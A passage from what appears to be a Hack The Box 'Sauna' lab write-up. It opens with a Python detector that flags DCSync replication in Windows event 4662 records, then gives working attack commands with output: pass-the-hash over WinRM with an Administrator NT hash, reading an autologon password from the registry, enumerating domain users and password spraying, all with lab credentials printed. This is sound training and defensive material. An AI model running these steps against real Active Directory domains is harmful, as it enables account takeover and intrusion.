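From the defensive side, the DRSUAPI replication call above leaves a trace: with Directory Service Access auditing enabled and a SACL on the domain object that audits Control Access, each replication request logs a Security event 4662 whose Properties field carries the control-access GUIDs for DS-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2). The following detection logic is an added example, not part of the original writeup or of any product: it runs over constructed 4662 records (shaped like the fields a SIEM extracts from the event; the records themselves are made up for the example) and flags replication rights exercised by anything other than a known DC computer account.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662 records."""
import re

# controlAccessRight GUIDs from the AD schema that a DCSync has to exercise.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def replication_rights_in(properties: str) -> list:
    """Names of the replication rights referenced by a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def is_expected_replicator(user: str, known_dcs: set) -> bool:
    """DC computer accounts replicate among themselves; that is the only benign source."""
    return user.endswith("$") and user.upper() in known_dcs


def detect_dcsync(events: list, known_dcs: set) -> list:
    """Return one finding per 4662 where a non-DC principal used a replication right."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights_in(ev.get("Properties", ""))
        if not rights:
            continue  # some other object access, e.g. reading a user attribute
        user = ev["SubjectUserName"]
        if is_expected_replicator(user, known_dcs):
            continue
        findings.append({
            "user": f'{ev["SubjectDomainName"]}\\{user}',
            "logon_id": ev.get("SubjectLogonId"),  # join with 4624 to get the source IP
            "rights": rights,
            # Get-Changes alone cannot pull secrets; Get-Changes-All is the real DCSync signal.
            "severity": "high" if "DS-Replication-Get-Changes-All" in rights else "medium",
        })
    return findings


# Constructed sample records (not real logs from the box). Object-type GUIDs are the schema
# GUIDs for domainDNS and user; the logon IDs are made-up values.
DOMAIN_DNS = "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}"
USER_CLASS = "%{bf967aba-0de6-11d0-a285-00aa003049e2}"
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "SubjectDomainName": "EGOTISTICALBANK",
     "SubjectLogonId": "0x3e7", "ObjectType": DOMAIN_DNS,
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "SubjectDomainName": "EGOTISTICALBANK",
     "SubjectLogonId": "0x1a2b3c", "ObjectType": DOMAIN_DNS,
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "FSmith", "SubjectDomainName": "EGOTISTICALBANK",
     "SubjectLogonId": "0x4d5e6f", "ObjectType": USER_CLASS,
     "Properties": "Read Property {bf967a68-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for finding in detect_dcsync(SAMPLE_EVENTS, {"SAUNA$"}):
        print(finding)
```

Event 4662 does not carry the client address, so join SubjectLogonId with the matching 4624 logon event to recover it. Allow-list by DC computer account rather than by IP, and treat Get-Changes-All from a non-DC as high severity because that is the right that actually releases password hashes.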
Pass-the-hash over WinRM with the Administrator NT hash, and we have root:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ winrmexec EGOTISTICAL-BANK.LOCAL/administrator:@10.129.95.180 -hashes :823452073d75b9d1cf70ebdf86c7f98e
'prompt_toolkit' not installed, using built-in 'readline'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] '-target_ip' not specified, using 10.129.95.180
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://10.129.95.180:5985/wsman
PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
287a09705351b7b12056d70fc6c4aa57
PS C:\Users\Administrator\Documents>
Beyond root
If you cannot upload a tool in a more restricted environment, you can also read the password from the registry yourself; then use fsmith's credentials to list the domain users and spray the password across them.
PS C:\Users\FSmith\Documents> Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
AutoRestartShell : 1
Background : 0 0 0
CachedLogonsCount : 10
DebugServerCommand : no
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DisableBackButton : 1
EnableSIHostIntegration : 1
ForceUnlockLogon : 0
LegalNoticeCaption :
LegalNoticeText :
PasswordExpiryWarning : 5
PowerdownAfterShutdown : 0
PreCreateKnownFolders : {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk : 1
Shell : explorer.exe
ShellCritical : 0
ShellInfrastructure : sihost.exe
SiHostCritical : 0
SiHostReadyTimeOut : 0
SiHostRestartCountLimit : 0
SiHostRestartTimeGap : 0
Userinit : C:\Windows\system32\userinit.exe,
VMApplet : SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled : 0
scremoveoption : 0
DisableCAD : 1
LastLogOffEndTimePerfCounter : 2358450679
ShutdownFlags : 2147484203
DisableLockWorkstation : 0
DefaultPassword : Moneymakestheworldgoround!
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
PSChildName : Winlogon
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
Then list the domain users with fsmith's credentials and spray the password. One password tried once per user stays well under any sane lockout threshold, but check the domain's lockout policy before spraying:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc ldap 10.129.95.180 -u fsmith -p Thestrokes23 --users-export users.txt
LDAP 10.129.95.180 389 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.95.180 389 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
LDAP 10.129.95.180 389 SAUNA [*] Enumerated 6 domain users: EGOTISTICAL-BANK.LOCAL
LDAP 10.129.95.180 389 SAUNA -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.95.180 389 SAUNA Administrator 2021-07-26 09:16:16 0 Built-in account for administering the computer/domain
LDAP 10.129.95.180 389 SAUNA Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.129.95.180 389 SAUNA krbtgt 2020-01-22 21:45:30 0 Key Distribution Center Service Account
LDAP 10.129.95.180 389 SAUNA HSmith 2020-01-22 21:54:34 40
LDAP 10.129.95.180 389 SAUNA FSmith 2020-01-23 08:45:19 0
LDAP 10.129.95.180 389 SAUNA svc_loanmgr 2020-01-24 15:48:31 0
LDAP 10.129.95.180 389 SAUNA [*] Writing 6 local users to users.txt
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u users.txt -p 'Moneymakestheworldgoround!'
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\Administrator:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\Guest:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\krbtgt:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\HSmith:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\FSmith:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!
